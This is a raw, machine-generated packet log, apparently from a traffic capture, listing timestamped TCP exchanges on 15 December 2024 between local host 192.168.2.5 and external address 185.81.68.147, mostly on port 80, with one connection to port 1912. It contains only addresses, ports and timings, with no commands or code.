                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.638163090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.638183117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.638242006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.639343977 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.639394045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.639451981 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.640497923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.640568018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.640641928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.641633987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.641722918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.641835928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.642787933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.642993927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.643060923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.644026995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.644092083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.644191027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.645123005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.645143032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.645342112 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.646272898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.646429062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.646553993 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.647542000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.647562027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.647627115 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.648565054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.648706913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.648767948 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.649849892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.649866104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.649939060 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.650959015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.650978088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.651067972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.652153969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.652173996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.652239084 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.653254032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.653390884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.653434992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.654359102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.654501915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.834001064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.835302114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.835367918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.835376024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.836369038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.836388111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.836427927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.837407112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.837426901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.837488890 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.838412046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.838466883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.838577986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.839607954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.839669943 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.839730978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.840831041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.840863943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.840886116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.841912031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.841984034 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.842031002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.843214989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.843235016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.843272924 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.844322920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.844378948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.844393969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.845494032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.845525026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.845544100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.846538067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.846605062 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.846651077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.847726107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.847843885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.847863913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.848948956 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.848982096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.848999977 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.850045919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.850106001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.850213051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.851330996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.851351023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.851388931 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.852475882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.852495909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.852551937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.853631973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.853655100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.853682041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.854799986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.854815960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.854882002 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.855906010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.855974913 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.855987072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.857065916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.857228041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.857310057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.858248949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.858269930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.858295918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.859371901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.859424114 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.859460115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.860582113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.860635042 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.860651970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.861661911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.861716032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.861769915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.862852097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.862979889 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.863010883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.911273003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.995203018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.995255947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.995348930 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.995517969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.995872974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.995908976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.995938063 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.996977091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.997071028 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.997109890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.998178959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.998248100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.998317003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.999375105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.999444008 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.999473095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.000487089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.000523090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.000547886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.001576900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.001646042 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.051642895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.052666903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.052735090 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.052788019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.053888083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.054001093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.054013014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.054966927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.055100918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.055128098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.059345961 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.098754883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.179177046 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.187340021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.187685013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.187942982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.187978983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.188007116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.188044071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.189155102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.189188957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.189244032 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.190265894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.190546036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.190602064 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.191380024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.191458941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.192114115 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.192629099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.192663908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.192734003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.193653107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.193805933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.193865061 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.194988966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.195024014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.195091009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.196099043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.196203947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.196261883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.197165012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.197304010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.197357893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.198314905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.198473930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.198781967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.199580908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.199697971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.200263977 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.200676918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.200834990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.200895071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.201817989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.201942921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.201996088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.203006983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.203269958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.203339100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.204236031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.204269886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.204848051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.205280066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.205429077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.205482006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.206510067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.206614017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.206682920 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.207616091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.207865000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.207933903 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.208784103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.209059954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.209119081 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.209984064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.210036039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.210098028 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.211194992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.211230993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.211301088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.212393999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.212429047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.212524891 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.213459969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.213515997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.213641882 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.214592934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.214699030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.214764118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.215744972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.215934038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.216058016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.217034101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.217068911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.217174053 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.218198061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.218239069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.218301058 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.219336033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.399410963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.399550915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.400192976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.400671005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.400778055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.400899887 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.401861906 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.402013063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.402241945 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.403001070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.403017044 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.403089046 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.404182911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.404198885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.404417992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.405380964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.405397892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.405517101 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.406414986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.406621933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.406725883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.407665968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.407681942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.407768011 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.408714056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.408837080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.409395933 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.409987926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.410006046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.410104990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.411201954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.411217928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.411380053 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.412359953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.412398100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.412503958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.413495064 CET8049708185.81.68.147192.168.2.5
